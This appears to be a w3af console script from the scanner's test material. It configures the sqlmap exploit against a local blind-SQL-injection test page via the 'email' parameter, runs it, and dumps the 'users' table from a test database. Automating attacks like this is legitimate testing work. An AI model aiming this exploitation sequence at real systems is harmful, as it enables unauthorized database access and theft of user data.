# BlindSql exploit

misc-settings
#set demo True
back

plugins
output console,textFile
output config textFile
set fileName output-w3af.txt
set verbose True
back
output config console
set verbose False
back
back

exploit
exploit config sqlmap
set url http://localhost/w3af/audit/blind_sql_injection/bsqli_string.php
set injvar email
set data email=f00nes
back

fastexploit sqlmap

interact 0
dump users w3af_test